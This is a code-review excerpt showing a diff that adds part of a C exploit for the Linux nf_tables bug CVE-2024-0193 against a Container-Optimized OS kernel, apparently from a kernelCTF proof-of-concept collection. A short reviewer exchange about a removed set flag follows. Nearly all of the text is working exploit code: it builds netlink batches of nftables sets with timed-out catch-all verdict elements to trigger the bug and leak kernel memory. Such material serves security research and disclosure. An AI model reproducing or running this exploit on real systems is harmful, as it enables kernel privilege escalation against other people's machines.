pocs/linux/kernelctf/CVE-2024-0193_cos/exploit/cos-105-17412.226.52/exploit.c

```diff
@@ -0,0 +1,864 @@
+    nftnl_set_add_expr(set_leak, expr_last);
+
+    size_t buf_size = MNL_SOCKET_BUFFER_SIZE * 100;
+    char *buf = malloc(buf_size);
+
+    struct mnl_nlmsg_batch * batch;
+    int seq = 0;
+    struct nlmsghdr * nlh;
+
+    batch = mnl_nlmsg_batch_start(buf, buf_size);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
+                                NFT_MSG_NEWSET, family, NLM_F_CREATE, seq++);
+    nftnl_set_nlmsg_build_payload(nlh, set_leak);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+}
+
+int trig(){
+    struct nftnl_table * table = nftnl_table_alloc();
+    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table1_name);
+    nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);
+
+    uint32_t set1_id = 1337, set2_id = 1338;
+    int set_ksize = 8;
+    uint8_t desc_concat[20] = {0,};
+    desc_concat[0] = 2;
+    desc_concat[1] = 2;
+
+    struct nftnl_set * set1 =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set1, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set1, NFTNL_SET_NAME, set1_name);
+    nftnl_set_set_u32(set1, NFTNL_SET_FLAGS,  NFT_SET_CONCAT | NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_MAP);
+    nftnl_set_set_u32(set1, NFTNL_SET_KEY_LEN, set_ksize);
+    nftnl_set_set_u32(set1, NFTNL_SET_ID, set1_id);
+    nftnl_set_set_u32(set1, NFTNL_SET_DESC_SIZE, 1);
+    nftnl_set_set_u32(set1, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT);
+    nftnl_set_set_data(set1, NFTNL_SET_DESC_CONCAT, desc_concat, 10);
+
+    struct nftnl_set * set1_elem =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set1_elem, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set1_elem, NFTNL_SET_NAME, set1_name);
+
+    struct nftnl_set_elem * elem1 = nftnl_set_elem_alloc();
+
+    nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_FLAGS, NFT_SET_ELEM_CATCHALL);
+    nftnl_set_elem_set_str(elem1, NFTNL_SET_ELEM_CHAIN, chain3_name);
+    nftnl_set_elem_set_u32(elem1, NFTNL_SET_ELEM_VERDICT, NFT_GOTO);
+    nftnl_set_elem_set_u64(elem1, NFTNL_SET_ELEM_TIMEOUT, 1);
+
+    nftnl_set_elem_add(set1_elem, elem1);
+
+    struct nftnl_set * set2 =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set2, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set2, NFTNL_SET_NAME, set2_name);
+    nftnl_set_set_u32(set2, NFTNL_SET_FLAGS,  NFT_SET_CONCAT | NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_MAP);
+    nftnl_set_set_u32(set2, NFTNL_SET_KEY_LEN, set_ksize);
+    nftnl_set_set_u32(set2, NFTNL_SET_ID, set2_id);
+    nftnl_set_set_u32(set2, NFTNL_SET_DESC_SIZE, 1);
+    nftnl_set_set_u32(set2, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT);
+    nftnl_set_set_data(set2, NFTNL_SET_DESC_CONCAT, desc_concat, 10);
```

Comment:
Why is NFTNL_SET_GC_INTERVAL not needed anymore?

Reply:
I removed it because the flag is irrelevant to the exploit.